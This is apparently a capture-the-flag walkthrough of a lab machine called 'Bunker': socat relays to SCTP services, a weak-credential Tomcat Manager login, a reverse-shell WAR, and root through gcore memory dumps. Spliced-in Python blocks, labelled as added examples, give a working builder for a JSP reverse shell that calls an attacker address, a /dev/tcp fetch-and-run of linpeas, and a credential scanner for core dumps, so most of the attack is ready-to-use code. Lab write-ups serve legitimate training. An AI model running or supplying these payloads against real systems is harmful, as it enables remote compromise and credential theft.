infosecwriteups.com

Walkthrough of the Bunker Machine on VulnX Platform: Medium Difficulty Boot to Root

AAKASH SHARMA

Introduction

Welcome to this in-depth walkthrough of the Bunker machine on the VulnX platform! In this guide, we’ll explore a comprehensive approach to conquering the Bunker machine, which is set at a medium difficulty level. Whether you’re a seasoned penetration tester or an aspiring cybersecurity enthusiast, this walkthrough is designed to enhance your skills and provide valuable insights into the boot-to-root process.

About the Bunker Machine

The Bunker machine presents a well-rounded challenge, combining various aspects of cybersecurity from initial access to privilege escalation. It offers a balanced mix of vulnerability assessment and exploitation techniques, making it an excellent exercise for those looking to sharpen their penetration testing abilities.

Objective

The goal of this walkthrough is to guide you through the entire process of compromising the Bunker machine, from discovering initial vulnerabilities to achieving root access. We’ll cover every step in detail, ensuring you understand the techniques and tools used along the way.

What You’ll Learn

  1. Initial Reconnaissance: How to gather information about the target machine to identify potential attack vectors.
  2. Vulnerability Exploitation: Techniques for exploiting discovered vulnerabilities to gain initial access.
  3. Privilege Escalation: Methods to escalate privileges from a standard user to root, leveraging misconfigurations and weaknesses.
  4. Post-Exploitation: Strategies for securing and maintaining access, as well as cleanup processes.

Prerequisites

Before diving into this walkthrough, ensure you have a basic understanding of penetration testing methodologies, common security tools, and Linux command-line operations. Familiarity with tools like nmap, netcat, socat, and gcore will be beneficial.

Walkthrough by Aakash Sharma

This detailed guide is authored by Aakash Sharma, a cybersecurity professional with a passion for ethical hacking and security research. Aakash brings a wealth of experience in penetration testing and a deep understanding of the techniques required to tackle medium-difficulty challenges like the Bunker machine.

Start the machine.

1. Initial Reconnaissance

Start by scanning the target to identify open ports and services; nmap is the tool for this. Begin with a full TCP port scan:

nmap -p- [target-ip]

Port 80 is open. Keep in mind that nmap's default scan types only cover TCP (and UDP with -sU): the SCTP service found in step 3 below is only listed by an SCTP INIT scan (nmap's -sY option, which needs root).

2. Add an entry for the target to your hosts file:

sudo vim /etc/hosts


3. An unknown service is running on port 8080 over SCTP.

  • Install ncat if it is not already installed:

On Debian-based systems (like Ubuntu), you can install it using:

sudo apt-get install ncat

On Red Hat-based systems the package is called nmap-ncat:

sudo yum install nmap-ncat

  • Connect to the SCTP Service:

Use ncat to connect to the SCTP service on port 8080:

ncat --sctp [target-ip] 8080

Replace [target-ip] with the IP address of the target machine.


Using the cat command.

4. Understanding the socat command

  • socat: A command-line utility that establishes two bidirectional byte streams and transfers data between them.
  • TCP-LISTEN:8081,fork: This tells socat to listen on TCP port 8081. The fork option lets socat handle multiple connections simultaneously by creating a new process for each connection.
  • SCTP:192.168.29.116:8080: This specifies that the data received on the TCP port should be forwarded to the SCTP service on IP address 192.168.29.116, port 8080. Ordinary clients (browsers, nc, ssh) only speak TCP, so this relay is what lets them reach the SCTP-only service.

Setting Up Traffic Forwarding

Here’s how to set up and use the socat command for forwarding TCP traffic to an SCTP service:

1. Install socat

Ensure socat is installed on your system. You can install it using your package manager:

  • On Debian-based systems (like Ubuntu):


sudo apt-get install socat

  • On Red Hat-based systems (like CentOS):

sudo yum install socat

2. Run the socat command

To forward TCP traffic on port 8081 to an SCTP service on 192.168.29.116 port 8080, run:

socat TCP-LISTEN:8081,fork SCTP:192.168.29.116:8080

3. Verify the setup

  1. Test the TCP listening port:

Open a new terminal and check that socat is listening on TCP port 8081 (on systems without netstat, ss -tlnp gives the same view):

sudo netstat -tuln | grep 8081

  2. Connect to the TCP port:

You can now connect to TCP port 8081 and the traffic will be forwarded to the SCTP port:

nc -v localhost 8081


5. It works.
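To make clear what the socat command above actually does, here is a minimal relay of the same shape written for this walkthrough (added example, not part of the original post and not socat's code): a TCP listener that, per accepted client (socat's fork), opens a fresh upstream connection and copies bytes in both directions until either side hits EOF. The upstream factory takes a protocol number, so connector(host, port, IPPROTO_SCTP) is the SCTP:host:port side for the real target, while the offline demo below uses a constructed TCP echo server as a stand-in; the target address 192.168.29.116:8080 in the comment is assumed from the write-up.

```python
"""Minimal socat-style relay (added example): what `socat TCP-LISTEN:8081,fork SCTP:...:8080`
does, i.e. accept TCP clients and splice each one onto a fresh upstream connection."""
import socket
import threading
from contextlib import suppress

# Linux defines IPPROTO_SCTP as 132; Python only exposes the constant where the platform has it.
IPPROTO_SCTP = getattr(socket, "IPPROTO_SCTP", 132)


def pump(src, dst):
    """Copy bytes src -> dst until EOF or error, then half-close dst so its peer sees EOF too."""
    with suppress(OSError):
        for chunk in iter(lambda: src.recv(4096), b""):
            dst.sendall(chunk)
    with suppress(OSError):
        dst.shutdown(socket.SHUT_WR)


def splice(client, upstream):
    """Per-connection work (socat's forked child): a pump each way, then close both ends."""
    pumps = [threading.Thread(target=pump, args=pair, daemon=True)
             for pair in ((client, upstream), (upstream, client))]
    for t in pumps:
        t.start()
    for t in pumps:
        t.join()
    client.close()
    upstream.close()


def connector(host, port, proto=0):
    """Factory that opens a new upstream connection per client. proto=IPPROTO_SCTP is the
    SCTP:host:port side for the real target (Linux needs the sctp kernel module); 0 means TCP."""
    def connect():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, proto)
        s.connect((host, port))
        return s
    return connect


def listen(host, port):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))  # port 0 asks the kernel for an ephemeral port
    srv.listen(16)
    return srv


def accept_forever(srv, handler):
    """The `fork` option: accept until the listener is closed, one daemon thread per client."""
    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()


def start_relay(listen_host, listen_port, connect):
    """TCP-LISTEN:<port>,fork in front of connect(); returns (listening socket, bound port)."""
    srv = listen(listen_host, listen_port)

    def handle(client):
        try:
            upstream = connect()
        except OSError:
            client.close()  # upstream unreachable: drop this client, keep serving the rest
            return
        splice(client, upstream)

    accept_forever(srv, handle)
    return srv, srv.getsockname()[1]


def start_echo_server():
    """Constructed stand-in for the target service (demo only): TCP echo on an ephemeral port."""
    srv = listen("127.0.0.1", 0)

    def echo(conn):
        with conn:
            for chunk in iter(lambda: conn.recv(4096), b""):
                conn.sendall(chunk)

    accept_forever(srv, echo)
    return srv, srv.getsockname()[1]


def relay_roundtrip(payload):
    """Offline demo: client -> relay -> echo server and back; returns what the client received."""
    echo, echo_port = start_echo_server()
    relay, relay_port = start_relay("127.0.0.1", 0, connector("127.0.0.1", echo_port))
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # done sending; the EOF propagates through both hops
            return b"".join(iter(lambda: c.recv(4096), b""))
    finally:
        relay.close()
        echo.close()


if __name__ == "__main__":
    # Real use, equivalent to the socat command in the write-up (addresses assumed from it):
    #   start_relay("127.0.0.1", 8081, connector("192.168.29.116", 8080, IPPROTO_SCTP))
    print(relay_roundtrip(b"GET / HTTP/1.0\r\n\r\n"))
```

The half-close in pump is the detail that makes the relay transparent: when the browser finishes its request the EOF is passed on to the SCTP side and back, so the service behind the relay sees the same connection lifecycle it would see from a native SCTP client.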


6. Tomcat Manager web application

Tomcat's Manager web application often provides a straightforward way in:

  • Access the Manager webapp: Open a web browser and navigate to http://[target-ip]:8080/manager/html. If, as here, port 8080 is only reachable over SCTP, point the browser at the socat relay instead (http://localhost:8081/manager/html). Log in with the well-known weak credentials: username tomcat, password tomcat. (Tomcat ships with no enabled Manager users; these only work because an administrator added them to conf/tomcat-users.xml, which is exactly the misconfiguration to look for.)


7. Upload a payload: Use Metasploit's msfvenom to generate a reverse shell payload (LHOST is your attacking machine's address, which the target must be able to reach over TCP):


msfvenom -p java/jsp_shell_reverse_tcp LHOST=[your-ip] LPORT=1337 -f war > shell.war

Deploy this shell.war to the Tomcat server through the Manager interface (the "WAR file to deploy" form).

8. Set up a listener: Use ncat or nc to listen for the reverse shell:

nc -nlvp 1337


9. Trigger the payload: Browse to http://[target-ip]:8080/shell (through the relay, http://localhost:8081/shell). Tomcat deploys shell.war under the context path /shell, and the first request runs the JSP, which connects back to your listener and hands you a shell.
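Steps 7 to 9 work because a WAR is just a zip archive with a WEB-INF/web.xml descriptor, and Tomcat serves the descriptor's welcome file for a request to the context path. The following builder, added here as an example and not code from the original post or from Metasploit, produces a WAR of the same shape as the msfvenom output so you can inspect what you are deploying before uploading it. The JSP reverse shell inside it is my own constructed scriptlet (msfvenom's template differs in detail), and the attacker address 10.10.10.10 and port 1337 are assumed values that must match your listener.

```python
"""Build a Tomcat WAR that runs a JSP reverse shell (added example). It mirrors the
shape of msfvenom's war output so you can see why deploying shell.war and then
requesting /shell/ makes the target connect back."""
import io
import posixpath
import zipfile

# Constructed JSP reverse shell (Java scriptlet); __LHOST__/__LPORT__ are filled in by build_war().
# Everything sits in one try/catch because Thread.sleep throws a checked exception.
JSP_REVERSE_SHELL = """<%@ page import="java.io.*,java.net.*" %><%
try {
  Socket sock = new Socket("__LHOST__", __LPORT__);
  Process proc = new ProcessBuilder("/bin/sh").redirectErrorStream(true).start();
  InputStream pin = proc.getInputStream(), sin = sock.getInputStream();
  OutputStream pout = proc.getOutputStream(), sout = sock.getOutputStream();
  while (!sock.isClosed()) {
    while (pin.available() > 0) sout.write(pin.read());   // shell output -> attacker
    while (sin.available() > 0) pout.write(sin.read());   // attacker input -> shell
    sout.flush(); pout.flush();
    Thread.sleep(50);
    try { proc.exitValue(); break; } catch (IllegalThreadStateException e) {}
  }
  proc.destroy(); sock.close();
} catch (Exception e) {}
%>
"""

# Deployment descriptor: the welcome-file is what Tomcat serves for a request to the bare context path.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <welcome-file-list><welcome-file>__JSP__</welcome-file></welcome-file-list>
</web-app>
"""


def build_war(lhost, lport, jsp_name="index.jsp"):
    """Return the WAR as bytes: a zip holding WEB-INF/web.xml plus the JSP it points at."""
    jsp = JSP_REVERSE_SHELL.replace("__LHOST__", lhost).replace("__LPORT__", str(int(lport)))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("WEB-INF/web.xml", WEB_XML.replace("__JSP__", jsp_name))
        zf.writestr(jsp_name, jsp)
    return buf.getvalue()


def war_entries(war_bytes):
    """Map of entry name -> text, handy for checking what you are about to deploy."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as zf:
        return {name: zf.read(name).decode() for name in zf.namelist()}


def trigger_url(base, war_filename):
    """Tomcat deploys NAME.war at context path /NAME; a request to /NAME/ runs the welcome file."""
    context = posixpath.splitext(posixpath.basename(war_filename))[0]
    return f"{base.rstrip('/')}/{context}/"


if __name__ == "__main__":
    # Assumed attacker address/port; they must match the listener (nc -nlvp 1337).
    war = build_war("10.10.10.10", 1337)
    with open("shell.war", "wb") as f:
        f.write(war)
    print(sorted(war_entries(war)))
    print(trigger_url("http://localhost:8081", "shell.war"))  # via the socat relay
```

Because the JSP is compiled on first request, the shell only appears after you browse to the trigger URL, which is why the listener has to be running before step 9.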


The listener receives a shell. It is a bare, non-interactive shell, so upgrade it to bash with a pseudo-terminal:

SHELL=/bin/bash script -q /dev/null


Privilege escalation enumeration with linpeas

Preparation and transport of linpeas

First, transfer the linpeas script to the victim machine. Use netcat to serve the file:

On the Attacker’s Machine:

# Serve linpeas.sh to the first client that connects (port 80 needs root, hence sudo;
# -q 5 closes the connection 5 s after EOF and is a netcat-openbsd/traditional option, ncat lacks it)

sudo nc -q 5 -lvnp 80 < linpeas.sh

On the Victim Machine:

# Fetch and execute linpeas.sh over the connection (replace 10.10.10.10 with your attacker IP).
# The /dev/tcp redirection is a bash feature, not available in sh/dash, so run it from the upgraded bash shell.

cat < /dev/tcp/10.10.10.10/80 | sh


linpeas finds an SSH private key backup in the Tomcat directory:


  • Copying the SSH private key for privilege escalation

Once linpeas has run and you have identified the SSH private key, copy it and set the permissions ssh requires (it refuses keys that other users can read):

# Copy the SSH private key to the current directory

cp /var/lib/tomcat10/backups/id_rsa.bak .

# Restrict permissions so ssh will accept the key

chmod 600 id_rsa.bak

We use this private key to log in over SSH as the sysadmin user.


Setting up port forwarding using socat

The SSH service on the target is likewise only reachable over SCTP, while the ssh client speaks TCP, so open a new terminal and set up another socat relay:

# Forward TCP connections to port 2222 on the local machine to SCTP port 22 on the target

socat TCP-LISTEN:2222,fork SCTP:192.168.29.116:22

Then connect with ssh to localhost on port 2222 as sysadmin, using id_rsa.bak as the identity file, and we have a shell as that user.


Checking User Privileges

Verify what commands the current user (sysadmin) can run with sudo:


# Check sudo privileges for the current user

sudo -l

You’ll see output similar to:


User sysadmin may run the following commands on bunker:

(root) NOPASSWD: /usr/bin/gcore

gcore has an entry on GTFOBins, which describes it as follows:

It can be used to generate core dumps of running processes. Such files often contain sensitive information such as the content of open files, cryptographic keys, passwords, etc. This command produces a binary file named core.$PID, which is then often filtered with strings to narrow down relevant information.


Using gcore to extract sensitive information

Identify processes that might hold sensitive information, for example those running as root:

# List all processes and keep the ones owned by root

ps aux | grep root

Then use gcore to create a core dump of a specific process (replace PID with the actual process ID you are interested in):


# Generate a core dump for a specific process

sudo gcore <PID>

Note: If gcore fails with a message like ptrace: No such process, verify the process ID and ensure it's correct.

Finding and Using Passwords

After generating the core dump, search through it with strings. Match case-insensitively, because credentials often sit in environment blocks or config lines as PASSWORD= or passwd:

# Search for sensitive information in the core dump

strings core.<PID> | grep -i password

Finally, use the password you find to escalate privileges to the root user.

sysadmin@bunker:~$ head -n 30 core.394


The password is found in the dump.
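The strings | grep step above is the whole privilege escalation, so it is worth seeing what it actually does. The following scanner, written for this walkthrough as an added example (not code from the original post, and not strings(1) itself), extracts printable ASCII runs the way strings does, keeps only those containing a credential keyword, matches case-insensitively (the grep in the write-up would miss DB_PASSWORD=), and streams the file in chunks so a core dump of several gigabytes never has to be read into memory; the boundary handling makes sure a string split across two chunks is still found whole. The SAMPLE_CORE bytes and the credentials in them are constructed for the demo; nothing is taken from the real dump.

```python
"""Sift a core dump (or any binary file) for printable strings that look like
credentials: the Python equivalent of `strings core.<PID> | grep -i password`,
streaming the file in chunks so a large dump never has to fit in memory."""
import os
import re
import tempfile

# Credential-ish keywords, matched case-insensitively (PASSWORD=..., passwd:, Secret ...).
CRED_HINTS = re.compile(rb"pass(word|wd)?|secret|token|api[_-]?key|credential", re.IGNORECASE)


def extract_strings(blob, min_len=4):
    """Runs of at least min_len printable ASCII bytes, like strings(1) with its default of 4."""
    return [m.group() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def find_credentials(blob, min_len=4):
    """Only the strings that contain a credential keyword."""
    return [s for s in extract_strings(blob, min_len) if CRED_HINTS.search(s)]


def scan_file(path, chunk_size=1 << 20, min_len=4):
    """Stream a file chunk by chunk. The trailing printable run of each chunk is held back
    and prepended to the next one, so a string split across a chunk boundary is still found
    whole. Duplicates (very common in core dumps) are reported once, in order of first sight."""
    hits, seen, tail = [], set(), b""
    with open(path, "rb") as f:
        while True:
            chunk = f.read(chunk_size)
            data = tail + chunk
            cut = len(data)
            if chunk:
                # Walk back over printable bytes at the end: that run may continue in the next chunk.
                while cut > 0 and 0x20 <= data[cut - 1] <= 0x7E:
                    cut -= 1
            for s in find_credentials(data[:cut], min_len):
                if s not in seen:
                    seen.add(s)
                    hits.append(s)
            if not chunk:
                return hits  # end of file: everything left was scanned above
            tail = data[cut:]


# Constructed sample "core dump": binary noise around an environment block and a config line.
SAMPLE_CORE = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 16
    + b"PATH=/usr/bin:/bin\x00" + b"\xff\xfe" * 5
    + b"DB_PASSWORD=Winter2024!\x00" + b"\x00\x03" * 7
    + b"user=backup\x00" + b"pw\x00"          # "pw" is shorter than min_len and is dropped
    + b"ssh_password: hunter2\x00"
    + b"DB_PASSWORD=Winter2024!\x00"           # repeated, reported once by scan_file
)


def demo_scan(chunk_size=7):
    """Write SAMPLE_CORE to a temp file and scan it with a tiny chunk size to exercise the
    boundary handling; returns the credential strings found."""
    fd, path = tempfile.mkstemp(suffix=".core")
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(SAMPLE_CORE)
        return scan_file(path, chunk_size=chunk_size)
    finally:
        os.remove(path)


if __name__ == "__main__":
    # Real use after `sudo gcore <PID>`: for s in scan_file("core.<PID>"): print(s.decode())
    for s in demo_scan():
        print(s.decode())
```

On a real dump, widen CRED_HINTS to whatever the target's software calls its secrets (connection strings, "pwd", "key="), and remember that the dump also contains the heap of whichever process you chose, so pick the process with the best chance of holding the credential you are after rather than dumping everything.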


We are successfully root.